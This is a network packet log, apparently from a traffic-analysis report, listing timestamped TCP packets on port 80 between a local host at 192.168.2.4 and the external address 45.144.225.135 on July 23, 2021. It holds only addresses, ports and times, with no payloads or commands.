Jul 23, 2021 22:24:24.938935995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.938946962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938977957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.938997030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939012051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939043045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939054012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939070940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939096928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939110994 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939151049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939177990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939196110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939204931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939223051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939246893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939277887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939305067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939332962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939337969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939378023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939384937 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939399958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939421892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939425945 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939441919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939465046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939470053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939486027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939507961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939513922 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939529896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939543009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939563990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939575911 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939585924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939601898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939608097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939631939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939646006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939655066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939676046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939696074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939699888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939723015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939723969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939745903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939769983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939774990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939789057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939815044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939815044 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939832926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939852953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939862013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939873934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939892054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939913988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939914942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939934015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939955950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939958096 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939971924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.939980030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.939999104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940020084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940032005 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940042019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940063953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940084934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940087080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940109015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940114021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940129042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940151930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940161943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940176010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940197945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940220118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940226078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940241098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940258026 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.940263033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.940309048 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.945739985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.946449995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946470976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946490049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946511984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946528912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.946537018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946557045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946573019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.946611881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.946630955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.946640015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.958827019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.958873987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.958916903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.958939075 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.958956957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.958990097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959002972 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959026098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959060907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959091902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959094048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959140062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959155083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959189892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959223986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959229946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959266901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959305048 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959307909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959340096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959374905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959382057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959408998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959443092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959448099 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.959476948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959511995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.959518909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.960680008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.960772038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.960865021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961103916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961148977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961168051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.961260080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961325884 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.961397886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961582899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961648941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.961659908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961695910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.961740017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.961766005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962867975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962902069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962928057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962950945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962955952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.962975025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.962989092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.962999105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963012934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963021040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963044882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963068008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963076115 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963094950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963107109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963145018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963227987 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963253021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963463068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963517904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963521957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963547945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963573933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963593960 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963597059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963620901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963643074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963650942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963671923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963696957 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.963699102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963721991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.963745117 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.966933012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.966960907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.966984987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967009068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967040062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967065096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967088938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967123985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967068911 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967155933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967179060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967180967 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967190027 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967196941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967202902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967204094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967228889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967252016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967262983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967281103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967295885 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.967305899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967329979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.967360973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.969290018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969317913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969343901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969362974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.969371080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969394922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969404936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.969419003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969443083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969446898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.969479084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969484091 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.969506979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969528913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.969554901 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972532988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972569942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972596884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972601891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972634077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972665071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972667933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972692966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972702980 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972726107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972769022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972775936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972800016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972827911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972837925 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972855091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972888947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972898960 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972919941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972946882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.972956896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.972975016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973006010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973017931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973033905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973063946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973073006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973092079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973130941 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973136902 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973164082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973195076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973207951 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973225117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973256111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973283052 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973310947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973340988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973366022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973367929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973391056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973418951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973445892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973473072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973495007 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973499060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973531961 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973532915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973563910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973589897 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973618031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973644018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973670006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973699093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973726034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973759890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973792076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973829985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973865032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973882914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973892927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973896027 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973900080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973902941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973906040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973910093 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973918915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973927975 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.973946095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973973036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.973994017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974005938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974036932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974046946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974062920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974091053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974101067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974117994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974143982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974176884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974203110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974236965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974267006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974293947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974320889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974348068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974374056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974400043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974426985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974447966 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974458933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974459887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974462032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974466085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974468946 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974473953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974490881 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974499941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974526882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974560022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974565983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974587917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974613905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974632978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974642992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974669933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974688053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974704981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974735975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974745035 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.974762917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974792957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974819899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974847078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974874020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974900961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974934101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974963903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.974989891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975018024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975044966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.975070000 CEST	80	49750	45.144.225.135	192.168.2.4
